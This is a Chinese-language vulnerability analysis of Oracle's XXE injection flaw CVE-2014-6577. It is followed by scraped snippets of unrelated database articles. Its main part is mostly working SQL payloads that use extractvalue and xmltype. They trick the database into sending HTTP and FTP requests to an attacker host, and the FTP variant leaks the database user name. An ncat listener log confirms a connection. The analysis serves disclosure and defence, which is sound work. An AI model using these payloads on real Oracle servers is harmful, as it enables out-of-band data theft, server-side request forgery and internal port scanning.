Oracle数据库XXE注入漏洞(CVE-2014-6577)分析

在这篇文中,我们将共同分析一下Oracle数据库的XXE注入漏洞(CVE-2014-6577),Oracle公司1月20日发布了针对该漏洞的相关补丁。

有关XXE的相关知识,可以查看安全脉搏站内的另一篇文章《未知攻焉知防——XXE漏洞攻防》。

漏洞描述

Oracle数据库的XML解析器模块容易受到XML外部实体(XML External Entity , XXE)注入。

受影响版本:11.2.0.3, 11.2.0.4, 12.1.0.1 和12.1.0.2

所需权限:创建会话(CREATE SESSION)

技术细节

因为Oracle中XML解析器的安全特性,外模式得到了解决,但是并不解析。

这可以防止某些XXE注入攻击,例如读取远程数据库服务器上的本地文件。

然而,攻击者可以发送精心编制的SQL查询来触发XML解析器,诱骗服务器通过HTTP或者FTP连接一个远程资源。

这可能会因带外通道而导致数据泄露、远程内部系统上执行端口扫描、执行服务器端请求伪造(SSRF)攻击或会引起拒绝服务攻击(DoS)。

易受攻击的URI handler:

  • http:
  • ftp:

0x01

Oracle的XML解析器可以通过调用针对xml类型对象的extractvalue()函数来触发。下面是一个简单的示例,该示例利用一个简单的XXE注入payload来构造查询语句:

select extractvalue(xmltype(‘<!ENTITY xxe SYSTEM "etc/passwd">]>‘|| ‘&‘ ||‘xxe;‘),‘/l‘) from dual;

执行上面的查询语句将会引起如下错误:

ORA-31001: Invalid resource handle or path name "/etc/passwd"
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31001. 00000 - "Invalid resource handle or path name \"%s\""
*Cause: An invalid resource handle or path name was passed to
the XDB hierarchical resolver.
*Action: Pass a valid resouce handle or path name to the hierarchical
resolver.

这是因为文件URI处理程序被转换成了一个XDB库路径。

0x02

然而,换成HTTP URI处理程序来进行查询将会产生另一个问题。示例查询代码如下:

select extractvalue(xmltype(‘<!ENTITY xxe SYSTEM "http://IP/test">]>‘|| ‘&‘ ||‘xxe;‘),‘/l‘) from dual;

数据库服务器错误如下:

ORA-31020: The operation is not allowed, Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.

这个错误表明,FTP和HTTP URI处理程序可能被XML解析器接受。注意,上面的查询语句不会发送任何HTTP请求到攻击者的系统。

0x03

我们看下另一个XXE注入payload,这次引用的是一个参数实体,而不是文档实体:

select extractvalue(xmltype(‘<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>‘),‘/l‘) from dual;

执行该查询语句时,数据库服务器会产生上述同样的错误(ORA-31020)。不过,这次成功地诱骗服务器提交了一个对资源“test”的HTTP请求。下面是攻击者服务器上的HTTP日志:

ncat -lvp 80
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8

传统上来说,为了迫使服务器向外部资源发送HTTP请求,攻击者需要一定权限来访问UTL_HTTP包。因为extractvalue()对所有数据库用户都可用,故XXE注入带来了另一种方式来触发带外HTTP请求,而这种方法的实现不需要拥有上述所提权限。

0x04

FTP URI处理程序(FTP:)也可以用来触发Oracle的XML解析器。下面给出查询语句示例,该示例发送数据库用户名来作为FTP用户名:

select extractvalue(xmltype(‘<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://‘||user||‘:[email protected]/test"> %remote; %param1;]>‘),‘/l‘) from dual;

数据库服务器提示错误(注意错误码与上面的不同,因为提供的凭证不能用于登录远程FTP服务器)如下:

ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:[email protected]/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.

从下图中可看到,数据库用户名作为FTP用户名被包含在发送给攻击者服务器的FTP流量中:

时间: 2024-09-28 14:12:13

Oracle数据库XXE注入漏洞(CVE-2014-6577)分析的相关文章

Oracle数据库SQL注入浅析与防护建议

作者:安华金和 思成 SQL注入是在信息安全领域一种常见的攻击手段.但是大部分人理解的SQL注入就是通过把SQL命令插入到Web表单提交或在输入域名.页面请求时加入的查询字符串,最终达到欺骗服务器执行偏离预期的SQL命令.这种情况下的SQL注入,引发原因基本是网页对用户输入的信息缺乏校验而导致. 很多人认为只有网页才可以进行 SQL 注入,才有注入点.这是一个普遍对SQL 注入的错误认识.SQL注入严格来讲应该叫做数据库SQL注入.SQL注入的最终目的是获取数据库中存储的敏感信息.事实上,任何可

Oracle数据库中闪回恢复的详细分析

Oracle9i开始提供闪回查询,以便能在需要的时候查到过去某个时刻的一致性数据,这是通过Undo实现的.这个功能有很大的限制,就是相关事务的undo不能被覆盖,否则就无力回天了.oracle10g大大的增强了闪回查询的功能,并且提供了将整个数据库回退到过去某个时刻的能力,这是通过引入一种新的flashback log实现的. flashback log有点类似redo log,只不过redo log将数据库往前滚,flashback log则将Oracle数据库往后滚.为了保存管理和备份恢复相

【沙龙】2014 天山论剑 首届Oracle数据库技术分享交流沙龙

<2014 天山论剑 首届Oracle数据库技术分享交流沙龙>引言:牛顿说"我之所以成功,是因为我站在巨人的肩膀上".每个人都有思考的盲点,借由别人指出你的盲点,实现自我反省,是成功者具备的品质.遇到问题,不再自我摸索,找教练.你和什么样的人在一起,你就会变成什么样的人.只有改变才会带来改变,要想事情变好,只有你先变好. [活动目的] 为了帮助新疆区域内企业更好地利用数据库技术创造更多的利润,推动新疆地区ORACLE数据库技术在企业中的应用,帮助更多的技术人员提高自身的数据

SQL Server 2014 64位版本链接32位Oracle数据库

问题背景: 刚进入公司不久的BI新手,最近接部门的一个交接项目,需要在SQL Server上通过openquery来获取Oracle数据库的数据.各种配置,各种设置折腾了一周之久.在此,将自己的问题解决过程拿出来与大家分享.这里需要强调一点,网络资源虽然强大,但是每个人的问题一定是specific的,切忌生搬硬套. 系统配置:Windows server 2012 R2,64bit Intel Xeon 8 threads,48GB Memory: 预装软件:VS 2012 32bit,SQL

Oracle数据库漏洞隐患无需user/password快速入侵

作者:安华金和 思成 摘要 一般性的数据库漏洞,都是在成功连接或登录数据库后实现入侵:本文介绍两个在2012年暴露的Oracle漏洞,通过这两种漏洞的结合,可以在不掌握用户名/密码的情况下入侵Oracle,从而完成对数据的窃取或者破坏. 这两个漏洞就是CVE-2012-1675和CVE-2012-3137. 引言 国内外很多重要的系统都采用Oracle作为数据存储的数据库:在Oracle中存储着企业或政府大量敏感的信息,在金钱或政治的诱导下,内外部黑客会想法利用管理.网络.主机或数据库的自身漏洞

jdbc mysql crud dao模型 sql注入漏洞 jdbc 操作大文件

day17总结 今日内容 l JDBC 1.1 上次课内容总结 SQL语句: 1.外键约束:foreign key * 维护多个表关系! * 用来保证数据完整性! 2.三种关系: * 一对多: * 一个客户可以对应多个订单,一个订单只属于一个客户! * 建表原则: * 在多的一方创建一个字段,作为外键指向一的一方的主键!!! * 多对多: * 一个学生可以选择多个课程,一个课程也可以被多个学生选择! * 建表原则: * 创建第三张表,第三张表中放入两个字段,作为外键分别指向多对多双方的主键! *

Hibernate框架中的HQL注入漏洞

 Hibernate是一种ORMapping框架,内部可以使用原生SQL还有HQL语言进行SQL操作. 所谓的HQL注入,就是指在Hibernate中没有对数据进行有效的验证导致恶意数据进入应用程序中造成的. 请看这段代码: Input参数即可造成注入. 不过在Hibernate中,一般都是在createQuery中使用PDO,使用setString填充占位符进行sql语句的拼接,如果是这样的话,自然就不存在SQL注入,但是不排除有人像上面的图片中的写法. 正常情况下: Sqlin参数存在注

[转]SQL注入漏洞及绑定变量浅谈

1.一个问题引发的思考 大家在群里讨论了一个问题,奉文帅之命写篇作文,且看: String user_web = "user_web"String sql = "update user set user_web="+user_web+" where userid=2343"; 大家看看这条sql有没有问题,会将user_web字段 更新成什么? 问题的结论是:执行后的记录结果跟执行前一样,(执行时的sql语句为 update user set u

Oracle数据库监听器引起的安全威胁和防护技术

1.引言 在今年的两会上,<政府采购法实施条例>正式实施.虽然安全行业迎来了数据库国产化的春天,但现今Oracle依旧是中国政府机关,使用最广泛的数据库.其安全性受到广泛关注. Oracle数据库必须使用TNS Listener(数据库监听器)来完成数据库和客户端之间的通讯.因此TNS Listener的漏洞成了很多黑客的主要目标.这些TNS Listener的漏洞如果不及时处理,将对用户的信息资产造成重大损失,同时也使许多敏感信息处于危险境地.本文主要对TNS Listener的漏洞带来的安